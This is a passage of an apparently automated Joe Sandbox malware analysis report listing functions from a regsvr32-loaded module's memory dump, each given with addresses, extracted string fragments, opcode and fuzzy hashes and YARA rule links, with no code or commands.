                                    • Instruction Fuzzy Hash: A4619CB490438E8FCB48DF68C88A5CE7BB0FB48758F104A19EC26A7250D3B49664CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180017710 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :/$MX-$p/{
                                    • API String ID: 0-4131788469
                                    • Opcode ID: dafbc4e7fc6d693899884ed9ed99f384ad96a46aea59d1081574b489c0c87a57
                                    • Instruction ID: 300bb33d5e72857c277ccbf4b656446e283825a036a8781aa3fd7c6b43312ff2
                                    • Opcode Fuzzy Hash: dafbc4e7fc6d693899884ed9ed99f384ad96a46aea59d1081574b489c0c87a57
                                    • Instruction Fuzzy Hash: A451CFB181034E8FCB48CF68C49A9DEBFB0FB58358F104619E816A6260D3B496A4CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180014930 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X$^'$r]I
                                    • API String ID: 0-2222137400
                                    • Opcode ID: 6c7560d6808315bae7f49c2fb11faa3634dddad0bf829aa3411576f4b5dc867d
                                    • Instruction ID: 3b6e37f17289f863f41b4cc43218ba669218828eb13bdfb79aac3f5d198efd30
                                    • Opcode Fuzzy Hash: 6c7560d6808315bae7f49c2fb11faa3634dddad0bf829aa3411576f4b5dc867d
                                    • Instruction Fuzzy Hash: 363117B15087C48BD75DDFA8C49A21EFBE1BB84344F508A1DF5828A760D7F4D548CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800154B8 Relevance: 3.8, Strings: 3, Instructions: 64COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @$T3$$w4
                                    • API String ID: 0-2021144935
                                    • Opcode ID: bc7dc22fb94c9f236bd87286f30cded165edce72f2f8fa2203197d10143a9bcc
                                    • Instruction ID: b7ecb3d52509d16e0b7106ebb5b87557e4c245f613a26780fe6ea3dbe1bda8ab
                                    • Opcode Fuzzy Hash: bc7dc22fb94c9f236bd87286f30cded165edce72f2f8fa2203197d10143a9bcc
                                    • Instruction Fuzzy Hash: 2C31B1B452C781AFC788DF28C49981EBBE1FB88314F806A1CF8C68B354D7799815CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001890C Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: fuQ$z2[
                                    • API String ID: 0-2289383304
                                    • Opcode ID: 441494ec0c86c783de8318a42c6139c52bb1bde3da6283a2c639beb8e2f65b2f
                                    • Instruction ID: 6dbb2b06e415c8f3afbcfc152abca8622b4e8fcbe683a1ba83f0e2cb341d8d2f
                                    • Opcode Fuzzy Hash: 441494ec0c86c783de8318a42c6139c52bb1bde3da6283a2c639beb8e2f65b2f
                                    • Instruction Fuzzy Hash: 3EE11E7150670CCBDB68CF38C58A69D7BE1FF54348F205129EC1A9B262D770E929CB49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180020A34 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :C$kR[
                                    • API String ID: 0-2209222604
                                    • Opcode ID: 11a29c0ca78bb61b91ac56aed3bc2f39647a1b65c88feb917197daf0b3f95e80
                                    • Instruction ID: 7c9a6a6b3faeb9776e3b10aef600c10835f2b607fd00d40f7bdfdfd53dfcb9a1
                                    • Opcode Fuzzy Hash: 11a29c0ca78bb61b91ac56aed3bc2f39647a1b65c88feb917197daf0b3f95e80
                                    • Instruction Fuzzy Hash: 90D13870A4470C8FDB99DFA8D04A7DDBBF2FB48344F108119E80AAF295C7B49949CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800227E0 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: U/a$b*I
                                    • API String ID: 0-148379327
                                    • Opcode ID: 5fd17e9242f9f83aee3c84d8a49cb22fc0f07f7b85d6bf0c23bfb3783ccf2aec
                                    • Instruction ID: 7d254379c67d49f8dc4f025a9255c0c47b4989c88be3dfa38f92a25c6632ea03
                                    • Opcode Fuzzy Hash: 5fd17e9242f9f83aee3c84d8a49cb22fc0f07f7b85d6bf0c23bfb3783ccf2aec
                                    • Instruction Fuzzy Hash: 28D10B7150024E8BCB59CF68C88A6DE3FB0FB18398F155219FC5AA7250D7B8D698CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180022E38 Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Jl$aijA
                                    • API String ID: 0-1592139677
                                    • Opcode ID: 63e2519535c0a0a06864801ebef0b78a9df6d39fc0654acb9b8633e279544aec
                                    • Instruction ID: 7b4029e1b0f4c6d16455640de175402024ed69906be1bf35ac226dba8d49acae
                                    • Opcode Fuzzy Hash: 63e2519535c0a0a06864801ebef0b78a9df6d39fc0654acb9b8633e279544aec
                                    • Instruction Fuzzy Hash: 4AC1217111474CCFDBA9CF28C59A6DA3BE8FF48344F10412AFC5A86261C774EA58CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180021F7C Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: E!X$aT
                                    • API String ID: 0-1608121357
                                    • Opcode ID: 6891fb2d6db3071f9b84c44756173137ff7b28830fe573994ee80e512644894e
                                    • Instruction ID: 4d019785a6b4256ed0cfe79ca05195ecf0bf4926bcad1b682180c0cba5e5cf4f
                                    • Opcode Fuzzy Hash: 6891fb2d6db3071f9b84c44756173137ff7b28830fe573994ee80e512644894e
                                    • Instruction Fuzzy Hash: 16B12770E0470ECFCB99DFE8C4556EFB7B6FB58388F0081599806A6290DB748719CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000C85C Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: i6$5t
                                    • API String ID: 0-3127670231
                                    • Opcode ID: a253027af394429a069129eb83cd81c4fb0c40bb542b60a20d2aa22b5b78e39c
                                    • Instruction ID: 343c37a285082c0d22a0c6c838fe19bbba7b54ff6f1f952ba2714c32cb406723
                                    • Opcode Fuzzy Hash: a253027af394429a069129eb83cd81c4fb0c40bb542b60a20d2aa22b5b78e39c
                                    • Instruction Fuzzy Hash: B6A1E270D087188FDB69DFB9C88A69DBBF0FB48708F20821DD856A7252DB749949CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002868C Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: t3Z$r'
                                    • API String ID: 0-3247238830
                                    • Opcode ID: 45187aede304d4735527529db4b0bfe1669f1d2749ba8206633b0fe433a295e4
                                    • Instruction ID: 1d29c97d450220819c0ed5b60dd6ff5608267f61915941bb22285759947d3464
                                    • Opcode Fuzzy Hash: 45187aede304d4735527529db4b0bfe1669f1d2749ba8206633b0fe433a295e4
                                    • Instruction Fuzzy Hash: 74A1EC706057CC9FEBB9DF24C8897DE7BA0FB4A344F50461DE88A8E260DB745649CB02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800180D4 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: N}V$jt
                                    • API String ID: 0-2926509837
                                    • Opcode ID: b049d5321a5d0b8b2c35b06077383899f8fb99c1ca51b799598ed477ff688beb
                                    • Instruction ID: 5d852b2b0b88ea82dc6b1cd0fb1e099f39aebf29041bab94b5a0a50aabd496dc
                                    • Opcode Fuzzy Hash: b049d5321a5d0b8b2c35b06077383899f8fb99c1ca51b799598ed477ff688beb
                                    • Instruction Fuzzy Hash: 64A148B990628CDFCB98DFA8C5CA58D7BB1FF44308F00411AFC169A256D7B4D629CB49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000B618 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: |I$}r/
                                    • API String ID: 0-4123960085
                                    • Opcode ID: a5b20f145e2128ebb590cd3c49dff006a35873bd4209483889af058205fdcd1a
                                    • Instruction ID: 800e601dd46cbb9d9738628f52141beaff35432bc8d4d1bcfb76f59376750d80
                                    • Opcode Fuzzy Hash: a5b20f145e2128ebb590cd3c49dff006a35873bd4209483889af058205fdcd1a
                                    • Instruction Fuzzy Hash: 2981F2711047888BDBB9CF28C88A7DA7BA1FB95348F50C219D88ECE261DF75564DDB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001B3B8 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fd7$T;
                                    • API String ID: 0-1040651304
                                    • Opcode ID: 7f0199fa78f26e8ae3d4cfff6d4ba3547f4bc3c86668e4528162529d3c3e3bb8
                                    • Instruction ID: 7ffd56a0096037782dccd6a22a1dfddd73a4019a8d8d07411bfc7024195b5d88
                                    • Opcode Fuzzy Hash: 7f0199fa78f26e8ae3d4cfff6d4ba3547f4bc3c86668e4528162529d3c3e3bb8
                                    • Instruction Fuzzy Hash: 8071E47051074D9FCB89CF24C8C9ADA7FB1FB483A8FA56218FC0696255C774D989CB84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180008BC0 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: bep$o1S[
                                    • API String ID: 0-985821681
                                    • Opcode ID: c77bf9ac064369e7680d63b20ce0fc89bb0b2606aa702be6d1acaa4fa6638a8c
                                    • Instruction ID: 91a209abfe7e4aeb1d81c4716095da0dca5975d88cd9946800e077bcf0a455c5
                                    • Opcode Fuzzy Hash: c77bf9ac064369e7680d63b20ce0fc89bb0b2606aa702be6d1acaa4fa6638a8c
                                    • Instruction Fuzzy Hash: C2513A70A0830D8FDB68DFA8C4456EEB7F2FB58358F004519E44AEB290DB349A19CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800087A4 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: _6#$u<
                                    • API String ID: 0-4076860791
                                    • Opcode ID: 98c419b77e8ba2554e3faf170cbc78b74b026a1788d9e59b3cc1785a688e6d9f
                                    • Instruction ID: 493e3a016aefd0e8f5cec56f814c132ed6dac505d4b0458c18be2d4878a88dba
                                    • Opcode Fuzzy Hash: 98c419b77e8ba2554e3faf170cbc78b74b026a1788d9e59b3cc1785a688e6d9f
                                    • Instruction Fuzzy Hash: D451C0B190070A8BCB48CF68C4965DE7FB1FB68394F24422DE856A6350D3749AA5CFD4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180010590 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Nz$Nz
                                    • API String ID: 0-3618188535
                                    • Opcode ID: f1f9fac336b8da8ff6122659e216f65e6467f6a7eb6b837c99e1b7255e82ae59
                                    • Instruction ID: b98bb35d41bec71e3509b0825005519e10211f24d4dcfaaa5e415a9a600f37b2
                                    • Opcode Fuzzy Hash: f1f9fac336b8da8ff6122659e216f65e6467f6a7eb6b837c99e1b7255e82ae59
                                    • Instruction Fuzzy Hash: 7761D97060478C9FDBB9CF54D8857DE3AA1FB46344F60851AA88E8A250CFB45788CB43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180023B48 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 10W$ra"
                                    • API String ID: 0-3432184507
                                    • Opcode ID: fd02e9085198f1ee23cd325c43483fe701dbbe4b729f3c21db55c4e968cbf284
                                    • Instruction ID: 1603a0fb70214c4199dc1879cc592ce20ce94242888b692f3a5634201c3c6fcf
                                    • Opcode Fuzzy Hash: fd02e9085198f1ee23cd325c43483fe701dbbe4b729f3c21db55c4e968cbf284
                                    • Instruction Fuzzy Hash: 215106B1D0070E8BCF48DFA5C48A5EEBFB1FB58358F218109E815A6260D7B49695CFC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000E06C Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Dm"i$e
                                    • API String ID: 0-579088429
                                    • Opcode ID: 1da592fe1c5b87024080557b40311a255aea64fd983cac56dc8e0bfd413ff1a3
                                    • Instruction ID: ff289f4c4decf21b808411560f97a6ae0bbfde48fa9fd21a36285b9362365cbb
                                    • Opcode Fuzzy Hash: 1da592fe1c5b87024080557b40311a255aea64fd983cac56dc8e0bfd413ff1a3
                                    • Instruction Fuzzy Hash: 1251A1B180038ECFCF88CF68D8865CE7BB0FF58358F105A19E865A6260D3B49664CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180016088 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: . 9$j~F
                                    • API String ID: 0-3982525500
                                    • Opcode ID: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                    • Instruction ID: 73f587e096f547b5323f36eeea6c902c11c99e62676f2e49b342c8d806439c0b
                                    • Opcode Fuzzy Hash: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                    • Instruction Fuzzy Hash: C951E3B190034A8FCF48CF68C5864EE7FB1FB58398F50461DE85AAA250D37896A4CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001CABC Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <>$u_"
                                    • API String ID: 0-3712044913
                                    • Opcode ID: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                    • Instruction ID: 00705162336351badf1f89c020232bf89398a1e9550ad3a4c6adce9a79b90856
                                    • Opcode Fuzzy Hash: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                    • Instruction Fuzzy Hash: FC51BFB090034E8FCB48CF69D48A5DE7FB1FB58398F104619E856AA250D37496A8CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180011CCC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Wm$`W
                                    • API String ID: 0-829970788
                                    • Opcode ID: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                    • Instruction ID: 3e5335a01fca1db20c73b4a4a46b2fe43dbf21032e81bd0b2231691c24575172
                                    • Opcode Fuzzy Hash: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                    • Instruction Fuzzy Hash: F041C070D1461C8FCF48DFA9D886ADDBBB0FB48304F20821DE456B6260C7789948CF69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002B1D4 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7M$kJz
                                    • API String ID: 0-1286445197
                                    • Opcode ID: 98bdb79501751698457a0c63b58abd008b0bb4ffe469ed6aba7912a1c6e09250
                                    • Instruction ID: 73e64fa095a73a4e7c26ce88557ae34d60ddb43780546a58e46c5e1049f230da
                                    • Opcode Fuzzy Hash: 98bdb79501751698457a0c63b58abd008b0bb4ffe469ed6aba7912a1c6e09250
                                    • Instruction Fuzzy Hash: E441D5B180034E9FCB48CF68D48A5DEBFB0FB58398F118619F815AA260D7B49694CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180029C6C Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: NKi$gJk
                                    • API String ID: 0-746334108
                                    • Opcode ID: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                    • Instruction ID: 370847f9a3576a2127be3913012de96f7d2fcf003f6ba5f8aec55f91b5c1372d
                                    • Opcode Fuzzy Hash: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                    • Instruction Fuzzy Hash: AD41C3B091034A8FCB48CF68C48A5DE7FF0FB28398F104619E815A6250D37496A8CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000FC8C Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 97"$lND
                                    • API String ID: 0-255837067
                                    • Opcode ID: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                    • Instruction ID: fdd228a39bc21f447827aa5875072745b1c1c90cd936de3499e4094daaa9051d
                                    • Opcode Fuzzy Hash: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                    • Instruction Fuzzy Hash: 2F41D4B080038E8FCB48CFA8D8865DE7BF0FB48358F504609E86AA6250D7B49665CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180025374 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <\$P
                                    • API String ID: 0-3329260309
                                    • Opcode ID: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                    • Instruction ID: 7a6472800a972813acd2230f771f615073e8df7510407cf225569f4894f6b0d7
                                    • Opcode Fuzzy Hash: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                    • Instruction Fuzzy Hash: AC41A2B181034DCFDB44CF68C88A5DE7FF0FB58358F104619E869A6250D7B89698CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800083F8 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &Z];$j,
                                    • API String ID: 0-1323350831
                                    • Opcode ID: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                    • Instruction ID: 4d52acf51d445db6beda3a26974f1176594abf5478927dcbf805cd9d8e8fa18c
                                    • Opcode Fuzzy Hash: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                    • Instruction Fuzzy Hash: 9F31DEB190074E8BCF48DF24C88A1DE3BA1FB28798F50461DFC5696250D7B4D6A4CBC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180026C80 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'd=$Y6C
                                    • API String ID: 0-2002142494
                                    • Opcode ID: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                    • Instruction ID: ccf6aaa63b1aa8c6b30d000549e8006a3e599278b8e3fc9790a4e3cb01e02506
                                    • Opcode Fuzzy Hash: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                    • Instruction Fuzzy Hash: 744191B190034E9FCB44CFA8D48A5DEBFF0FB58398F205619E81AA6250D3B49694CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180010250 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 27A$Cm)X
                                    • API String ID: 0-3608389941
                                    • Opcode ID: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                    • Instruction ID: 684b918ddde8746cffb287e87a4350d0062747792986074a3c358ea6f2ed809a
                                    • Opcode Fuzzy Hash: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                    • Instruction Fuzzy Hash: 15316FB46187848B8348DF28D59551ABBE5FBCC308F404B2DF4CAAB360D778D644CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000E8F0 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?oCf$Wu
                                    • API String ID: 0-2445847193
